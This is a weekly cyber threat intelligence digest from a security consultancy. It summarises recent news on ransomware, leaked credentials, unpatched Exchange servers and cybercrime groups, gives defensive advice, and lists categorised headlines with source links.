-The UK Cyber Governance Code of Practice: Beyond Basic Protections to Culture, Leadership and Training

-The Human Firewall: Building a Cyber-Aware Workforce

-Microsoft Warns Organisations Without a Rehearsed Response Plan Are Hit Harder by a Security Incident

-Attack Yourself First: the Logic Behind Offensive Security

-These Two Ransomware Groups Are Ramping Up Attacks and Have Claimed Hundreds of Victims

-Financial Services Could Be Next in Line for ShinyHunters

-Three Notorious Cybercrime Gangs, Scattered Spider, ShinyHunters and Lapsus$, Appear to Be Collaborating

-Nation State Actor Groups are Getting Personal, Going After Executives in Their Personal Lives

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

We begin with two calls to action for stronger cyber security: ensure your systems are patched to fix vulnerabilities, in this case Microsoft Exchange servers, and ensure your team uses strong passwords. We also report on the ongoing rise in cyber attacks including the increase in ransomware, the use of physical violence in cryptocurrency-related incidents, and changes within the attacker community such as a further shift towards the financial services sector.

To address these and other threats, it is essential to have a clear and objective understanding of your risks, and to counter them through a strategy that encompasses people, operations and technology.

The UK Cyber Governance Code of Practice is a valuable reference, even for organisations outside the UK. It includes two key principles: build strong defences through your employees, and rehearse how your leadership team will respond to an incident. It is also strongly recommended to commission assessments from an attacker’s perspective, to identify and resolve vulnerabilities before they are exploited.

Contact us for impartial specialist advice and support to implement the above in a proportionate and effective manner.


Top Cyber Stories of the Last Week

Over 29,000 Exchange Servers Still Unpatched Against High-Severity Flaw

Over 29,000 Microsoft Exchange servers remain unpatched against a serious flaw that could allow attackers to gain full control of both cloud and on-premises systems in hybrid environments. The vulnerability affects Exchange 2016, 2019 and Subscription Edition, and can be exploited to bypass detection by forging trusted credentials. Despite a fix released in April 2025, scans show large numbers of exposed systems worldwide. US federal agencies have been ordered to apply patches immediately, and all organisations are strongly advised to follow suit to prevent potential domain compromise.

https://www.bleepingcomputer.com/news/security/over-29-000-exchange-servers-unpatched-against-high-severity-flaw/

Nearly Half of Enterprises Tested Had Easily Cracked Passwords

Picus Security’s 2025 Blue Report found that nearly half of enterprises tested had at least one easily cracked password, with attacks using valid credentials succeeding 98% of the time. Overall, the ability to block an attack dropped from 69% in 2024 to 62%, while the ability to stop data theft fell to just 3%. Detection weaknesses persisted, with only 14% of simulated attacks triggering alerts. The report urges stronger password policies, improved monitoring for data loss, and testing for ransomware scenarios to strengthen resilience.

https://siliconangle.com/2025/08/11/nearly-half-enterprises-tested-passwords-cracked-picus-security-report/

Leaked Credentials Up 160% - What Attackers Are Doing With Them

Leaked credentials are a growing driver of cyber breaches, accounting for 22% of incidents in 2024, according to Verizon. Cyberint reports a 160% rise in such leaks in 2025, with many remaining active and exploitable for months. Attackers increasingly use automated tools, infostealer malware, and AI-driven phishing to obtain usernames and passwords, which are then sold or reused for account takeovers, credential stuffing, and fraud. Even with strong password policies and multi-factor authentication, rapid detection is vital. Proactively identifying exposures before they are exploited is a key differentiator in reducing long-term business risk.

https://thehackernews.com/2025/08/leaked-credentials-up-160-what.html

Ransomware Attacks Up by 41% Globally

Global cyber attacks rose sharply in July, with ransomware incidents up 41% year-on-year to 487 cases. North America accounted for over half of these, followed by Europe. Business services, healthcare, and manufacturing were among the most affected sectors, while education faced the highest weekly attack rate at over 4,200 per organisation. North America saw the largest percentage increase. Notable ransomware groups Qilin, Akira, and Play drove much of the activity, with Qilin alone linked to 17% of known cases, reflecting the growing scale and sophistication of financially motivated threats.

https://betanews.com/2025/08/11/ransomware-attacks-up-by-41-percent-globally/

Physical Threats to Crypto Owners Hit Record Highs

Criminals are increasingly targeting cryptocurrency holders through both physical violence and complex online scams. Experts warn that “wrench attacks”, where victims are coerced into handing over their digital assets under threat of harm, have risen sharply, sometimes for amounts as low as $6,000. Leaks of over 80 million user identities, including 2.2 million with home addresses, have made it easier for attackers to locate victims. At the same time, the “GreedyBear” group has stolen more than $1 million through malicious browser extensions, malware, and fake websites, highlighting the growing sophistication and scale of threats in the crypto sector.

https://coinpaper.com/10443/physical-threats-to-crypto-owners-hit-record-highs

The UK Cyber Governance Code of Practice: Beyond Basic Protections to Culture, Leadership and Training

Sectors including financial services, retail and government are facing millions of sophisticated cyber attacks each month. The UK Government’s Cyber Governance Code of Practice urges boards to strengthen cyber risk management by fostering a security-focused culture, improving leadership cyber literacy, and delivering tailored, ongoing training for all staff. In 2024, global ransomware payments reached $813.55 million, underlining the stakes. Technology alone is insufficient; a vigilant, well-trained workforce operating within a Zero Trust framework can significantly enhance defences against today’s fast-evolving digital threats.

https://www.techradar.com/pro/dont-stop-at-basic-protections-make-ongoing-training-a-priority

The Human Firewall: Building a Cyber-Aware Workforce

The UK government’s latest survey shows that half of all businesses, and nearly three quarters of large firms, experienced a cyber security breach in the past year, with the average cost of a UK data breach reaching £3.58 million. As human error is linked to up to 95% of incidents, the focus is shifting from one-off awareness sessions to role-specific training and cultural change. Gamification, real-time feedback, and positive reinforcement are helping organisations turn staff from potential vulnerabilities into proactive defenders, reducing successful attacks, cutting incident response costs, and strengthening compliance.

https://www.telecomstechnews.com/news/the-human-firewall-building-a-cyber-aware-workforce/

Microsoft Warns Organisations Without a Rehearsed Response Plan Are Hit Harder by a Security Incident

Microsoft has warned that organisations without a well-rehearsed incident response plan face longer and more damaging cyber attacks. Only one in four organisations have such a plan and have practised it. Those that regularly test their procedures, run exercises and assess vulnerabilities recover in days rather than months. Experts stressed the need for strong security fundamentals, including keeping software updated, enabling logging and applying proper configurations. Attackers increasingly move quickly, often exploiting basic weaknesses before using advanced techniques, making preparation and early detection critical for limiting business impact. Contact us for details of how Black Arrow can help your leadership team to prepare and rehearse managing the business impact of a cyber security incident.

https://cyberscoop.com/microsoft-threat-intel-response-tips/

Attack Yourself First: the Logic Behind Offensive Security

Recent high-profile cyber attacks on UK retailers have highlighted the speed and sophistication of modern threats, fuelled by automation and AI. Traditional defences such as firewalls and periodic checks are no longer enough, as attackers exploit weaknesses almost instantly. Offensive security, which proactively tests systems through simulated attacks, helps organisations find and fix critical vulnerabilities before criminals can exploit them. Leadership engagement is essential, ensuring cyber security is embedded into business strategy and transformation plans. The strongest organisations will be those that continuously validate their defences rather than relying on assumptions of security.

https://www.techradar.com/pro/attack-yourself-first-the-logic-behind-offensive-security

These Two Ransomware Groups Are Ramping Up Attacks and Have Claimed Hundreds of Victims 

Research by Acronis warns that the Akira and Lynx ransomware groups are intensifying attacks on small and medium-sized businesses, particularly managed service providers (MSPs). Akira has claimed over 220 victims and Lynx around 145, often gaining access through stolen credentials, VPN weaknesses, or phishing emails. Both disable security software, steal data, and encrypt systems to extort payment. MSPs are prime targets as they can provide access to multiple customers. Experts advise organisations to strengthen multi-factor authentication, keep external systems patched, and maintain robust, tested backups to reduce the risk of disruption and financial loss.

https://www.itpro.com/security/ransomware/msps-beware-these-two-ransomware-groups-are-ramping-up-attacks-and-have-claimed-hundreds-of-victims

Financial Services Could Be Next in Line for ShinyHunters

Threat intelligence suggests financially motivated cyber groups are shifting focus towards banks, insurers and financial services, with a 12% rise in targeted domain registrations since July 2025, while targeting of technology firms fell by 5%. Around 700 such domains have been registered this year, some mimicking login portals of major providers. Evidence points to overlap between ShinyHunters and Scattered Spider, both linked to an English-speaking youth movement involved in a range of cyber and physical crimes. Experts advise security leaders to focus on attacker tactics and behaviours rather than group names, to better anticipate and defend against evolving threats.

https://www.infosecurity-magazine.com/news/financial-services-next-line/

Three Notorious Cybercrime Gangs, Scattered Spider, ShinyHunters and Lapsus$, Appear to Be Collaborating

Three well-known cyber crime groups, Scattered Spider, ShinyHunters and Lapsus$, appear to be working together under a loose collective known as The Com. Recent activity suggests Scattered Spider is providing initial access to high-value targets, enabling ShinyHunters to carry out large-scale data theft and extortion. The groups have been linked to coordinated attacks on global retail, insurance, and aviation brands, often exploiting trusted enterprise tools like Salesforce and Okta through social engineering. Experts warn their methods are well-documented but highly effective, with weak helpdesk identity checks and poor multi-factor authentication enforcement remaining key vulnerabilities.

https://www.theregister.com/2025/08/12/scattered_spidershinyhunterslapsus_cybercrime_collab/

Nation State Actor Groups are Getting Personal, Going After Executives in Their Personal Lives

Threat groups linked to nation states are increasingly targeting executives through their personal lives, exploiting less secure home networks, private devices and family connections. Remote working, personal cloud use and active social media profiles provide openings for attackers to gather information and launch phishing or malware campaigns. Experts recommend organisations support executives with secure home network configurations, enterprise-grade device protections, credential monitoring, and training for both the individual and their family. This approach helps reduce the risk of personal-targeted cyber attacks while respecting privacy and avoiding intrusive monitoring.

https://www.helpnetsecurity.com/2025/08/12/apt-executive-cybersecurity-threats/



Threats

Ransomware, Extortion and Destructive Attacks

Ransomware attacks up by 41 percent globally - BetaNews

ShinyHunters Tactics Now Mirror Scattered Spider

Financial Services Could Be Next in Line for ShinyHunters - Infosecurity Magazine

Cybercrime Groups ShinyHunters, Scattered Spider Join Forces in Extortion Attacks on Businesses

Three notorious cybercrime gangs appear to be collaborating • The Register

Help Desk at Risk: Scattered Spider Shines Light on Overlooked Threat Vector - SecurityWeek

Ransomware crews don't care about your EDR • The Register

When Theft Replaces Encryption: Blue Report 2025 on Ransomware & Infostealers

Embargo Ransomware Gang Amasses $34.2m in Attack Proceeds - Infosecurity Magazine

MSPs beware – these two ransomware groups are ramping up attacks and have claimed hundreds of victims | ChannelPro

Charon Ransomware Hits Middle East Sectors Using APT-Level Evasion Tactics

New Ransomware Charon Uses Earth Baxia APT Techniques to Target Enterprises | Trend Micro (US)

Crypto24 ransomware hits large orgs with custom EDR evasion tool

Akira Ransomware Exploits SonicWall Zero-Day with BYOVD Evasion

MedusaLocker ransomware group is looking for pentesters

Embargo Ransomware nets $34.2M in crypto since April 2024

Crypto24 Ransomware Group Blends Legitimate Tools with Custom Malware for Stealth Attacks | Trend Micro (US)

MuddyWater’s DarkBit ransomware cracked for free data recovery

Ransomware crew dumps 43GB Saint Paul files, no ransom paid • The Register

North Korea Attacks South Koreans With Ransomware

Intel gathered following HSE attack leads to dismantling of ransomware gang – The Irish Times

US govt seizes $1 million in crypto from BlackSuit ransomware gang

Researchers cracked the encryption used by DarkBit ransomware

UK firms turn to back-ups over ransom payments - CIR Magazine

Law Enforcement Disrupts BlackSuit Ransomware Gang

Ransomware Victims

Google suffers a serious data breach at the hands of a ransomware group - PhoneArena

Google Confirms Data Breach - Notifying Users Affected By the Cyberattack

M&S still struggling with IT issues following cyberattack - Retail Gazette

Australian Regulator Sues Optus Over 2022 Data Breach - Infosecurity Magazine

What happened when cybercriminals hit a recruitment firm

M&S click and collect finally returns months after cyberattack | The Independent

Boeing, US Navy supplier Jamco Aerospace claimed in ransomware attack | Cybernews

Manpower franchise discloses data breach • The Register

Croatian research institute confirms ransomware attack via ToolShell vulnerabilities - Help Net Security

Phishing & Email Based Attacks

The Rise of Native Phishing: Microsoft 365 Apps Abused in Attacks

Threat Actors Personalize Phishing Attacks With Advanced Tactics for Malware Delivery

That email with your name in the subject line might not be from who you think, and it could carry malware | TechRadar

Phishing attacks exploit WinRAR flaw CVE-2025-8088 to install RomCom

WinRAR zero-day exploited to plant malware on archive extraction

Booking.com phishing campaign uses sneaky 'ん' character to trick you

Hackers Using Dedicated Phishlet to Launch FIDO Authentication Downgrade Attacks

UK immigration system targeted by hackers - dangerous new phishing campaign hits Sponsorship Management System | TechRadar

For $40, you can buy stolen police and government email accounts - Help Net Security

Other Social Engineering

Help Desk at Risk: Scattered Spider Shines Light on Overlooked Threat Vector - SecurityWeek

Google confirms data breach exposed potential Google Ads customers' info

Criminals built a secret Telegram network to steal 115 million cards without breaching a single bank firewall | TechRadar

Fraud, Scams and Financial Crime

Criminals built a secret Telegram network to steal 115 million cards without breaching a single bank firewall | TechRadar

FTC: older adults lost record $700 million to scammers in 2024

WhatsApp Bans 6.8M Scam Accounts in Southeast Asia with AI Tools

Deepfake detectors are coming of age, at a time of dire need • The Register

'Chairmen' of $100 million scam operation extradited to US

Over $300 million in cybercrime crypto seized in anti-fraud effort

Football clubs urged to tighten cyber security for fans at risk from scammers - Inside World Football

Artificial Intelligence

MITRE: Russian APT28's LameHug, a Pilot for Future AI Cyber-Attacks - Infosecurity Magazine

CISOs face a complex tangle of tools, threats, and AI uncertainty - Help Net Security

Red Teams Jailbreak GPT-5 With Ease, Warn It's ‘Nearly Unusable’ for Enterprise - SecurityWeek

Prompt injection vuln found in Google Gemini apps • The Register

Don't fall for AI-powered disinformation attacks online - here's how to stay sharp | ZDNET

Black Hat 2025: ChatGPT, Copilot, DeepSeek now create malware | VentureBeat

Guess what else GPT-5 is bad at? Security | CyberScoop

Leading AI Agents Like ChatGPT Are Vulnerable to Hacking, Security Firm Finds

New Report Warns of Looming Security Crisis as AI Agents Proliferate

62% of People Believe AI Agents Are Easier To Deceive Than Humans - IT Security Guru

Deepfake detectors are coming of age, at a time of dire need • The Register

Research reveals possible privacy gaps in Apple Intelligence’s data handling | CyberScoop

Echo Chamber, Prompts Used to Jailbreak GPT-5 in 24 Hours

From Lab to Deployment: AI-Powered Agents in Action

Google Cloud Warns of AI-Driven Ransomware Threats and Key Defenses

Employees race to build custom AI apps despite security risks - Help Net Security

Chinese biz using AI to influence US politicians • The Register

2FA/MFA

Hackers Using Dedicated Phishlet to Launch FIDO Authentication Downgrade Attacks

FIDO authentication undermined | CSO Online

Malware

Threat Actors Personalize Phishing Attacks With Advanced Tactics for Malware Delivery

That email with your name in the subject line might not be from who you think, and it could carry malware | TechRadar

When Theft Replaces Encryption: Blue Report 2025 on Ransomware & Infostealers

Phishing attacks exploit WinRAR flaw CVE-2025-8088 to install RomCom

WinRAR zero-day exploited to plant malware on archive extraction

The Efimer Trojan steals cryptocurrency via malicious torrent files and WordPress websites | Kaspersky official blog

BadCam: Linux-based Lenovo webcam bugs enable BadUSB attacks

Adult sites are stashing exploit code inside racy .svg files - Ars Technica

Russia's RomCom among those exploiting a WinRAR 0-day • The Register

This new malware really goes the extra mile when it comes to infecting your devices | TechRadar

Hackers Found Using CrossC2 to Expand Cobalt Strike Beacon's Reach to Linux and macOS

Malvertising Campaign Deploys Modular PowerShell Malware PS1Bot - Infosecurity Magazine

Crypto24 Ransomware Group Blends Legitimate Tools with Custom Malware for Stealth Attacks | Trend Micro (US)

Popular Apps Are Vessels for Malware—Here’s How To Protect Yourself

Mobile

Criminals built a secret Telegram network to steal 115 million cards without breaching a single bank firewall | TechRadar

Hackers Could Gain Full Control of Your Rooted Android Devices by Exploiting One Vulnerability

4 ways I spot and avoid phishing scams on my iPhone

KernelSU v0.5.7 Flaw Lets Android Apps Gain Root Access - Infosecurity Magazine

Denial of Service/DoS/DDoS

How to prevent DoS attacks and what to do if they happen | TechTarget

New Win-DDoS Flaws Let Attackers Turn Public Domain Controllers into DDoS Botnet via RPC, LDAP

Critical internet flaw lets attackers crash servers | Cybernews

'MadeYouReset' HTTP2 Vulnerability Enables Massive DDoS Attacks - SecurityWeek

Internet of Things – IoT

BadCam: Linux-based Lenovo webcam bugs enable BadUSB attacks

Security flaws in a carmaker's web portal let one hacker remotely unlock cars from anywhere | TechCrunch

Hackers Can Take Over Your Security Cameras—and It’s Easier Than You Think

Hyundai UK charging customers for luxury of secure car locks • The Register

Hackers Went Looking for a Backdoor in High-Security Safes—and Now Can Open Them in Seconds | WIRED

How a chain of security flaws exposed thousands of enterprise surveillance cameras to remote code execution - TechTalks

Hackers love these 7 smart home devices — here’s how to keep them secure | Tom's Guide

Smart Buses flaws expose vehicles to tracking, control, and spying

Data Breaches/Leaks

Leaked Credentials Up 160%: What Attackers Are Doing With Them

Google suffers a serious data breach at the hands of a ransomware group - PhoneArena

The US Court Records System Has Been Hacked | WIRED

New Active Directory Lateral Movement Techniques that Bypass Authentication and Exfiltrate Data

This infamous people search site is back after leaking 3 billion records - how to remove your data from it ASAP | ZDNET

Australian Regulator Sues Optus Over 2022 Data Breach - Infosecurity Magazine

The inside story of the Telemessage saga • The Register

North Korean Kimsuky hackers exposed in alleged data breach

Hackers leak 2.8M sensitive records from Allianz Life in Salesforce data breach

U.K. Secretly Spent $3.2 Million to Stop Journalists From Reporting on Data Breach - The New York Times

Cancer care provider breach exposes 113K+ patients | Cybernews

Connex Credit Union data breach impacts 172,000 members

Italian hotels breached en masse since June, gov confirms • The Register

ICE Accidentally Adds Wrong Person to Sensitive Group Chat About Manhunt

Organised Crime & Criminal Actors

Criminals built a secret Telegram network to steal 115 million cards without breaching a single bank firewall | TechRadar

Three notorious cybercrime gangs appear to be collaborating • The Register

Researchers identify Chinese cybercriminal working for North Korean threat group | NK News

6 ways hackers hide their tracks | CSO Online

Dark web websites: 10 things you should know | CSO Online

Inside the Dark Web’s Access Economy: How Hackers Sell the Keys to Enterprise Networks - SecurityWeek

Cybercriminals Exploit Low-Cost Initial Access Broker Market - Infosecurity Magazine

Threat actors move to smaller more persistent attacks - BetaNews

How money mules powered cyber cons’ ‘operating system’ | Lucknow News - Times of India

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Attackers Target the Foundations of Crypto: Smart Contracts

Crypto hacker steals $14.5 billion in Bitcoin using a gaming PC and nobody notices for five years | TechRadar

Physical Threats to Crypto Owners Hit Record Highs

The rise of real-world cyber threats | Opinion

The Efimer Trojan steals cryptocurrency via malicious torrent files and WordPress websites | Kaspersky official blog

Over $300 million in cybercrime crypto seized in anti-fraud effort

Embargo Ransomware nets $34.2M in crypto since April 2024

Insurance

Cyber insurance market shows early signs of maturity - Help Net Security

How Insurers Use Threat Intelligence to Reduce Losses

Cloud/SaaS

Google Cloud Warns of AI-Driven Ransomware Threats and Key Defenses

Researchers determine old vulnerabilities pose real-world threat to sensitive data in public clouds | CyberScoop

Outages

Major outage at Pennsylvania OAG blamed on 'cyber incident' • The Register

Identity and Access Management

New Active Directory Lateral Movement Techniques that Bypass Authentication and Exfiltrate Data

Encryption

BitUnlocker - Multiple 0-days to Bypass BitLocker and Extract All Protected Data

New TETRA Radio Encryption Flaws Expose Law Enforcement Communications

Critical SSH vulnerabilities expose enterprise network infrastructure as patching lags | Network World

White House could stymie the UK’s anti-encryption plans? • The Register

Linux and Open Source

BadCam: Linux-based Lenovo webcam bugs enable BadUSB attacks

Passwords, Credential Stuffing & Brute Force Attacks

46% of Enterprise Passwords Can Be Cracked | Security Magazine

Leaked Credentials Up 160%: What Attackers Are Doing With Them

Nearly half of enterprises tested had passwords cracked in Picus Security report - SiliconANGLE

Malvertising

Malvertising Campaign Deploys Modular PowerShell Malware PS1Bot - Infosecurity Magazine

Training, Education and Awareness

The human firewall: Building a cyber-aware workforce

Don't stop at basic protections; make ongoing training a priority | TechRadar

Regulations, Fines and Legislation

UK proxy traffic surges as users consider VPN alternatives • The Register

FCC tightens rules on foreign firms building undersea cables, citing security | CyberScoop

Government expands police use of live facial recognition vans - BBC News

Porn site traffic plummets as UK age verification rules enforced - BBC News

Australian Regulator Sues Optus Over 2022 Data Breach - Infosecurity Magazine

Cyber Regulatory Harmonization: The Prospects and Potential Impacts of Current Efforts | Wiley Rein LLP - JDSupra

UK passport database images used in facial recognition scans • The Register

Home Office explores biometric enrolment via smartphone – PublicTechnology

Eight Countries Face EU Action Over NIS2 Deadline Failings - Infosecurity Magazine

White House could stymie the UK’s anti-encryption plans? • The Register

Campaigners Slam Expansion of Police Facial Recognition Schemes in UK - Infosecurity Magazine

The overlooked changes that two Trump executive orders could bring to cybersecurity | CyberScoop

EU law to protect journalists from spyware takes effect | The Record from Recorded Future News

CISA pledges to continue backing CVE Program after April funding fiasco | The Record from Recorded Future News

Trump's unusual Nvidia deal raises new corporate and national security risks - The Economic Times

Models, Frameworks and Standards

EU Targets Nations Lagging on NIS2 Cyber Rules | SC Media UK

Eight Countries Face EU Action Over NIS2 Deadline Failings - Infosecurity Magazine

Cyber Regulatory Harmonization: The Prospects and Potential Impacts of Current Efforts | Wiley Rein LLP - JDSupra

Careers, Working in Cyber and Information Security

The UK’s ‘chronic shortage of cyber professionals’ is putting the country at risk | IT Pro

Top Cybersecurity Certifications Drive $150K+ Salaries Amid US Shortage

How military leadership prepares veterans for cybersecurity success - Help Net Security

Law Enforcement Action and Take Downs

Dark web websites: 10 things you should know | CSO Online

Over $300 million in cybercrime crypto seized in anti-fraud effort

'Chairmen' of $100 million scam operation extradited to US

US govt seizes $1 million in crypto from BlackSuit ransomware gang

Law Enforcement Disrupts BlackSuit Ransomware Gang

Intel gathered following HSE attack leads to dismantling of ransomware gang – The Irish Times

Misinformation, Disinformation and Propaganda

Don't fall for AI-powered disinformation attacks online - here's how to stay sharp | ZDNET

Your Internet, their rules: How DNS blocking shapes what we see online

Beijing’s hybrid warfare: How China seeks to win Taiwan without firing a shot | Taiwan News | Aug. 10, 2025 13:10

Chinese biz using AI to influence US politicians • The Register


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Commander of Polish Cyberspace Defense Forces: we are in our conflict phase

China Is Winning the Cyberwar | Foreign Affairs

Beijing’s hybrid warfare: How China seeks to win Taiwan without firing a shot | Taiwan News | Aug. 10, 2025 13:10

Nation State Actors

APT groups are getting personal, and CISOs should be concerned - Help Net Security

China

China Is Winning the Cyberwar | Foreign Affairs

Criminals built a secret Telegram network to steal 115 million cards without breaching a single bank firewall | TechRadar

APT groups are getting personal, and CISOs should be concerned - Help Net Security

Silicon under siege: Nation-state hackers target semiconductor supply chains | CSO Online

Trump's unusual Nvidia deal raises new corporate and national security risks - The Economic Times

Researchers identify Chinese cybercriminal working for North Korean threat group | NK News

Beijing’s hybrid warfare: How China seeks to win Taiwan without firing a shot | Taiwan News | Aug. 10, 2025 13:10

Chinese biz using AI to influence US politicians • The Register

Russia

MITRE: Russian APT28's LameHug, a Pilot for Future AI Cyber-Attacks - Infosecurity Magazine

Commander of Polish Cyberspace Defense Forces: we are in our conflict phase

Russia's RomCom among those exploiting a WinRAR 0-day • The Register

Finland charges tanker crew members with sabotage of undersea cables | Finland | The Guardian

REvil Actor Accuses Russia of Planning 2021 Kaseya Attack

Russia said to be behind US Federal Court systems hack | Cybernews

Norway spy chief blames Russian hackers for dam sabotage in April | Reuters

North Korea

North Korean Kimsuky hackers exposed in alleged data breach

Hackers breach and expose a major North Korean spying operation | TechCrunch

Researchers identify Chinese cybercriminal working for North Korean threat group | NK News

North Korean network breached, hackers claim - Washington Times

North Korea Attacks South Koreans With Ransomware

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Torture Victim’s Landmark Hacking Lawsuit Against Spyware Maker Can Proceed, Judge Rules | Electronic Frontier Foundation

EU law to protect journalists from spyware takes effect | The Record from Recorded Future News


Tools and Controls

CISOs face a complex tangle of tools, threats, and AI uncertainty - Help Net Security

The human firewall: Building a cyber-aware workforce

Don't stop at basic protections; make ongoing training a priority | TechRadar

Ransomware crews don't care about your EDR • The Register

Pentesting is now central to CISO strategy - Help Net Security

Microsoft: An organization without a response plan will be hit harder by a security incident | CyberScoop

UK proxy traffic surges as users consider VPN alternatives • The Register

Cyber insurance market shows early signs of maturity - Help Net Security

Crypto24 ransomware hits large orgs with custom EDR evasion tool

Navigating the Cybersecurity Budget Tug-of-War

Black Hat/DEF CON: AI more useful for defense than hacking • The Register

Why DNS threats should be on every CISO's radar in 2025 - Help Net Security

Attack yourself first: the logic behind offensive security | TechRadar

I am a chief security officer and here's why I think AI Cybersecurity has only itself to blame for the huge problem that's coming | TechRadar

How Insurers Use Threat Intelligence to Reduce Losses

FIDO authentication undermined | CSO Online

Deepfake detectors are coming of age, at a time of dire need • The Register

WhatsApp Bans 6.8M Scam Accounts in Southeast Asia with AI Tools

What Is the Three Lines Model and What Is Its Purpose? | Definition From TechTarget

UK Red Teamers “Deeply Skeptical” of AI - Infosecurity Magazine

What is DMARC and why it could prevent your organization from being hacked by cybercriminals | TechRadar

Your Internet, their rules: How DNS blocking shapes what we see online

Porn site traffic plummets as UK age verification rules enforced - BBC News

UK traffic to popular porn sites slumps after age checks introduced | Internet safety | The Guardian

Professional services firms stuck in network security IT doom loop | Computer Weekly

The rising need for offensive security strategy and skill | SC Media

Vulnerability Management

Microsoft Sued For Killing Windows 10—All Users Must Act Now

Windows 11 23H2 Home and Pro reach end of support in November

Researchers determine old vulnerabilities pose real-world threat to sensitive data in public clouds | CyberScoop

CISA pledges to continue backing CVE Program after April funding fiasco | The Record from Recorded Future News

Vulnerabilities

Russia's RomCom among those exploiting a WinRAR 0-day • The Register

WinRAR has a serious security flaw - worrying zero-day issue lets hackers plant malware, so patch right away | TechRadar

Over 29,000 Exchange servers unpatched against high-severity flaw

Microsoft August 2025 Patch Tuesday Fixes Kerberos Zero-Day Among 111 Total New Flaws

Over 3,000 NetScaler devices left unpatched against CitrixBleed 2 bug

Zoom patches critical Windows flaw allowing privilege escalation

Active attacks target Office vuln patched 8 years ago • The Register

Spike in Fortinet VPN brute-force attacks raises zero-day concerns

Cisco Warns of CVSS 10.0 FMC RADIUS Flaw Allowing Remote Code Execution

FortiWeb Authentication Bypass Vulnerability Lets Attackers Log In as Any Existing User

Windows Remote Desktop Services Vulnerability Lets Attackers Deny Service Over the Network

BitUnlocker - Multiple 0-days to Bypass BitLocker and Extract All Protected Data

Critical SSH vulnerabilities expose enterprise network infrastructure as patching lags | Network World

New Active Directory Lateral Movement Techniques That Bypass Authentication and Exfiltrate Data

New Win-DDoS Flaws Let Attackers Turn Public Domain Controllers into DDoS Botnet via RPC, LDAP

'MadeYouReset' HTTP2 Vulnerability Enables Massive DDoS Attacks - SecurityWeek

Red Teams Jailbreak GPT-5 With Ease, Warn It's ‘Nearly Unusable’ for Enterprise - SecurityWeek

Prompt injection vuln found in Google Gemini apps • The Register

Akira Ransomware Exploits SonicWall Zero-Day with BYOVD Evasion

Windows Hello for Business Flaw Could Allow Unauthorized Access

WinRAR Zero-Day Under Active Exploitation – Update to Latest Version Immediately

Microsoft Entra OAuth Flaw Exposed Internal Apps to Unauthorized Access

SonicWall pins firewall attack spree on year-old vulnerability | CyberScoop

Netherlands: Citrix Netscaler flaw CVE-2025-6543 exploited to breach orgs

Fortinet, Ivanti Release August 2025 Security Patches - SecurityWeek

Critical FortiSIEM Vulnerability Lets Attackers Execute Malicious Commands - PoC Found in the Wild

Fortinet SSL VPNs Hit by Global Brute-Force Wave Before Attackers Shift to FortiManager

Vulnerabilities in MSP-friendly RMM solution exploited in the wild (CVE-2025-8875, CVE-2025-8876) - Help Net Security

Hackers reportedly compromise Canadian House of Commons through Microsoft vulnerability | The Record from Recorded Future News

New Linux Kernel Vulnerability Directly Exploited from Chrome Renderer Sandbox

7-Zip Arbitrary File Write Vulnerability Lets Attackers Execute Arbitrary Code

Trend Micro reports two critical CVEs under active exploit • The Register

Chipmaker Patch Tuesday: Many Vulnerabilities Addressed by Intel, AMD, Nvidia - SecurityWeek

Vulnerabilities in Xerox Print Orchestration Product Allow Remote Code Execution - SecurityWeek

How a chain of security flaws exposed thousands of enterprise surveillance cameras to remote code execution - TechTalks

Hackers Could Gain Full Control of Your Rooted Android Devices by Exploiting One Vulnerability

Croatian research institute confirms ransomware attack via ToolShell vulnerabilities - Help Net Security

SAP fixed 26 flaws in August 2025 Update, including 4 Critical

Researchers Spot XZ Utils Backdoor in Dozens of Docker Hub Images, Fueling Supply Chain Risks

Flaws in a pair of Grafana plugins could hand over DevOps control | CSO Online

New TETRA Radio Encryption Flaws Expose Law Enforcement Communications

KernelSU v0.5.7 Flaw Lets Android Apps Gain Root Access - Infosecurity Magazine

Matrix admits 'high severity' flaws need breaking fixes • The Register
Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

- Automotive

- Construction

- Critical National Infrastructure (CNI)

- Defence & Space

- Education & Academia

- Energy & Utilities

- Estate Agencies

- Financial Services

- FinTech

- Food & Agriculture

- Gaming & Gambling

- Government & Public Sector (including Law Enforcement)

- Health/Medical/Pharma

- Hotels & Hospitality

- Insurance

- Legal

- Manufacturing

- Maritime & Shipping

- Oil, Gas & Mining

- OT, ICS, IIoT, SCADA & Cyber-Physical Systems

- Retail & eCommerce

- Small and Medium Sized Businesses (SMBs)

- Startups

- Telecoms

- Third Sector & Charities

- Transport & Aviation

- Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are provided for interest and awareness. Linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.